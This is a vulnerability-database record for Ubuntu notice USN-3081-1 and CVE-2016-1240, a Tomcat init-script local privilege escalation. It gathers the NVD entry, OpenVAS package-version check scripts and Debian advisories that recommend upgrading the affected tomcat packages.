ID: USN-3081-1 | Type: ubuntu | Reporter: Ubuntu | Modified: 2016-09-19T00:00:00
Description
Dawid Golunski discovered that the Tomcat init script incorrectly handled creating log files. A remote attacker could possibly use this issue to obtain root privileges. (CVE-2016-1240)
This update also reverts a change in behaviour introduced in USN-3024-1 by setting mapperContextRootRedirectEnabled to True by default.
{"cve": [{"lastseen": "2019-05-29T18:15:33", "bulletinFamily": "NVD", "description": "The Tomcat init script in the tomcat7 package before 7.0.56-3+deb8u4 and tomcat8 package before 8.0.14-1+deb8u3 on Debian jessie and the tomcat6 and libtomcat6-java packages before 6.0.35-1ubuntu3.8 on Ubuntu 12.04 LTS, the tomcat7 and libtomcat7-java packages before 7.0.52-1ubuntu0.7 on Ubuntu 14.04 LTS, and tomcat8 and libtomcat8-java packages before 8.0.32-1ubuntu1.2 on Ubuntu 16.04 LTS allows local users with access to the tomcat account to gain root privileges via a symlink attack on the Catalina log file, as demonstrated by /var/log/tomcat7/catalina.out.", "modified": "2018-10-09T19:59:00", "id": "CVE-2016-1240", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1240", "published": "2016-10-03T15:59:00", "title": "CVE-2016-1240", "type": "cve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-24T12:54:16", "bulletinFamily": "scanner", "description": "Dawid Golunski of LegalHackers discovered\nthat the Tomcat init script performed unsafe file handling, which could result in\nlocal privilege escalation.", "modified": "2017-07-07T00:00:00", "published": "2016-09-15T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=703669", "id": "OPENVAS:703669", "title": "Debian Security Advisory DSA 3669-1 (tomcat7 - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3669.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3669-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as 
published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703669);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2016-1240\");\n script_name(\"Debian Security Advisory DSA 3669-1 (tomcat7 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2016-09-15 00:00:00 +0200 (Thu, 15 Sep 2016)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3669.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"tomcat7 on Debian Linux\");\n script_tag(name: \"insight\", value: \"Apache Tomcat implements the Java Servlet\nand the JavaServer Pages (JSP) specifications from Sun Microsystems, and provides a\n'pure Java' HTTP web server environment for Java code to run.\");\n script_tag(name: \"solution\", value: \"For the 
stable distribution (jessie), this\nproblem has been fixed in version 7.0.56-3+deb8u4.\n\nWe recommend that you upgrade your tomcat7 packages.\");\n script_tag(name: \"summary\", value: \"Dawid Golunski of LegalHackers discovered\nthat the Tomcat init script performed unsafe file handling, which could result in\nlocal privilege escalation.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\"); \n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libservlet3.0-java\", ver:\"7.0.56-3+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libservlet3.0-java-doc\", ver:\"7.0.56-3+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtomcat7-java\", ver:\"7.0.56-3+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat7\", ver:\"7.0.56-3+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat7-admin\", ver:\"7.0.56-3+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat7-common\", ver:\"7.0.56-3+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat7-docs\", ver:\"7.0.56-3+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat7-examples\", ver:\"7.0.56-3+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat7-user\", ver:\"7.0.56-3+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": 
"2019-05-29T18:35:46", "bulletinFamily": "scanner", "description": "Dawid Golunski of LegalHackers discovered\nthat the Tomcat init script performed unsafe file handling, which could result in\nlocal privilege escalation.", "modified": "2019-03-18T00:00:00", "published": "2016-09-15T00:00:00", "id": "OPENVAS:1361412562310703669", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703669", "title": "Debian Security Advisory DSA 3669-1 (tomcat7 - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3669.nasl 14279 2019-03-18 14:48:34Z cfischer $\n# Auto-generated from advisory DSA 3669-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703669\");\n script_version(\"$Revision: 14279 $\");\n script_cve_id(\"CVE-2016-1240\");\n script_name(\"Debian Security Advisory DSA 3669-1 (tomcat7 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-15 00:00:00 +0200 (Thu, 15 Sep 2016)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3669.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"tomcat7 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie), this\nproblem has been fixed in version 7.0.56-3+deb8u4.\n\nWe recommend that you upgrade your tomcat7 packages.\");\n script_tag(name:\"summary\", value:\"Dawid Golunski of LegalHackers discovered\nthat the Tomcat init script performed unsafe file handling, which could result in\nlocal privilege escalation.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libservlet3.0-java\", ver:\"7.0.56-3+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libservlet3.0-java-doc\", ver:\"7.0.56-3+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libtomcat7-java\", ver:\"7.0.56-3+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat7\", ver:\"7.0.56-3+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat7-admin\", ver:\"7.0.56-3+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat7-common\", ver:\"7.0.56-3+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat7-docs\", ver:\"7.0.56-3+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat7-examples\", ver:\"7.0.56-3+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat7-user\", ver:\"7.0.56-3+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:44", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-09-20T00:00:00", "id": "OPENVAS:1361412562310842892", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842892", "title": "Ubuntu Update for tomcat8 USN-3081-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for tomcat8 USN-3081-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, 
http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842892\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-20 05:41:58 +0200 (Tue, 20 Sep 2016)\");\n script_cve_id(\"CVE-2016-1240\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for tomcat8 USN-3081-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'tomcat8'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Dawid Golunski discovered that the Tomcat\n init script incorrectly handled creating log files. A remote attacker could\n possibly use this issue to obtain root privileges. 
(CVE-2016-1240)\n\nThis update also reverts a change in behaviour introduced in USN-3024-1 by\nsetting mapperContextRootRedirectEnabled to True by default.\");\n script_tag(name:\"affected\", value:\"tomcat8 on Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3081-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3081-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|12\\.04 LTS|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libtomcat7-java\", ver:\"7.0.52-1ubuntu0.7\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"tomcat7\", ver:\"7.0.52-1ubuntu0.7\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libtomcat6-java\", ver:\"6.0.35-1ubuntu3.8\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"tomcat6\", ver:\"6.0.35-1ubuntu3.8\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libtomcat8-java\", ver:\"8.0.32-1ubuntu1.2\", rls:\"UBUNTU16.04 
LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"tomcat8\", ver:\"8.0.32-1ubuntu1.2\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:55:05", "bulletinFamily": "scanner", "description": "Dawid Golunski of LegalHackers discovered\nthat the Tomcat init script performed unsafe file handling, which could result in\nlocal privilege escalation.", "modified": "2017-07-07T00:00:00", "published": "2016-09-15T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=703670", "id": "OPENVAS:703670", "title": "Debian Security Advisory DSA 3670-1 (tomcat8 - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3670.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3670-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703670);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2016-1240\");\n script_name(\"Debian Security Advisory DSA 3670-1 (tomcat8 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2016-09-15 00:00:00 +0200 (Thu, 15 Sep 2016)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3670.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"tomcat8 on Debian Linux\");\n script_tag(name: \"insight\", value: \"Apache Tomcat implements the Java\nServlet and the JavaServer Pages (JSP) specifications from Oracle, and provides\na 'pure Java' HTTP web server environment for Java code to run.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie),\nthis problem has been fixed in version 8.0.14-1+deb8u3.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your tomcat8 packages.\");\n script_tag(name: \"summary\", value: \"Dawid Golunski of LegalHackers discovered\nthat the Tomcat 
init script performed unsafe file handling, which could result in\nlocal privilege escalation.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libservlet3.1-java\", ver:\"8.0.14-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libservlet3.1-java-doc\", ver:\"8.0.14-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtomcat8-java\", ver:\"8.0.14-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8\", ver:\"8.0.14-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8-admin\", ver:\"8.0.14-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8-common\", ver:\"8.0.14-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8-docs\", ver:\"8.0.14-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8-examples\", ver:\"8.0.14-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8-user\", ver:\"8.0.14-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:35:20", "bulletinFamily": "scanner", "description": "Dawid Golunski of LegalHackers discovered\nthat the Tomcat init script performed unsafe file handling, which could result in\nlocal privilege escalation.", "modified": 
"2019-03-18T00:00:00", "published": "2016-09-15T00:00:00", "id": "OPENVAS:1361412562310703670", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703670", "title": "Debian Security Advisory DSA 3670-1 (tomcat8 - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3670.nasl 14279 2019-03-18 14:48:34Z cfischer $\n# Auto-generated from advisory DSA 3670-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703670\");\n script_version(\"$Revision: 14279 $\");\n script_cve_id(\"CVE-2016-1240\");\n script_name(\"Debian Security Advisory DSA 3670-1 (tomcat8 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-15 00:00:00 +0200 (Thu, 15 Sep 2016)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3670.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"tomcat8 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie),\nthis problem has been fixed in version 8.0.14-1+deb8u3.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your tomcat8 packages.\");\n script_tag(name:\"summary\", value:\"Dawid Golunski of LegalHackers discovered\nthat the Tomcat init script performed unsafe file handling, which could result in\nlocal privilege escalation.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion 
using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libservlet3.1-java\", ver:\"8.0.14-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libservlet3.1-java-doc\", ver:\"8.0.14-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libtomcat8-java\", ver:\"8.0.14-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8\", ver:\"8.0.14-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8-admin\", ver:\"8.0.14-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8-common\", ver:\"8.0.14-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8-docs\", ver:\"8.0.14-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8-examples\", ver:\"8.0.14-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8-user\", ver:\"8.0.14-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2019-05-30T02:23:03", "bulletinFamily": "unix", "description": "Package : tomcat7\nVersion : 7.0.28-4+deb7u6\nCVE ID : CVE-2016-1240\n\n\nDawid Golunski from legalhackers.com discovered that Debian's version\nof Tomcat 7 was vulnerable to a local privilege escalation. 
Local\nattackers who have gained access to the server in the context of the\ntomcat7 user through a vulnerability in a web application were able to\nreplace the file with a symlink to an arbitrary file.\n\nThe full advisory can be found at\n\nhttp://legalhackers.com/advisories/Tomcat-Debian-based-Root-Privilege-Escalation-Exploit.txt\n\nIn addition this security update also fixes Debian bug #821391. File\nownership in /etc/tomcat7 will no longer be unconditionally overridden\non upgrade. As another precaution the file permissions of Debian\nspecific configuration files in /etc/tomcat7 were changed to 640 to\ndisallow world readable access.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n7.0.28-4+deb7u6.\n\nWe recommend that you upgrade your tomcat7 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "modified": "2016-09-15T15:08:18", "published": "2016-09-15T15:08:18", "id": "DEBIAN:DLA-623-1:9251E", "href": "https://lists.debian.org/debian-lts-announce/2016/debian-lts-announce-201609/msg00016.html", "title": "[SECURITY] [DLA 623-1] tomcat7 security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:21:49", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3669-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nSeptember 15, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : tomcat7\nCVE ID : CVE-2016-1240\n\nDawid Golunski of LegalHackers discovered that the Tomcat init script\nperformed unsafe file handling, which could result in local privilege\nescalation.\n\nFor the stable distribution (jessie), this problem has been fixed 
in\nversion 7.0.56-3+deb8u4.\n\nWe recommend that you upgrade your tomcat7 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2016-09-15T17:27:26", "published": "2016-09-15T17:27:26", "id": "DEBIAN:DSA-3669-1:CFB19", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2016/msg00248.html", "title": "[SECURITY] [DSA 3669-1] tomcat7 security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:21:27", "bulletinFamily": "unix", "description": "Package : tomcat6\nVersion : 6.0.45+dfsg-1~deb7u2\nCVE ID : CVE-2016-1240\n\n\n\nDawid Golunski from legalhackers.com discovered that Debian's version\nof Tomcat 6 was vulnerable to a local privilege escalation. Local\nattackers who have gained access to the server in the context of the\ntomcat6 user through a vulnerability in a web application were able to\nreplace the file with a symlink to an arbitrary file.\n\nThe full advisory can be found at\n\nhttp://legalhackers.com/advisories/Tomcat-Debian-based-Root-Privilege-Es\ncalation-Exploit.txt\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n6.0.45+dfsg-1~deb7u2.\n\nWe recommend that you upgrade your tomcat6 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "modified": "2016-09-15T14:47:02", "published": "2016-09-15T14:47:02", "id": "DEBIAN:DLA-622-1:61A2B", "href": 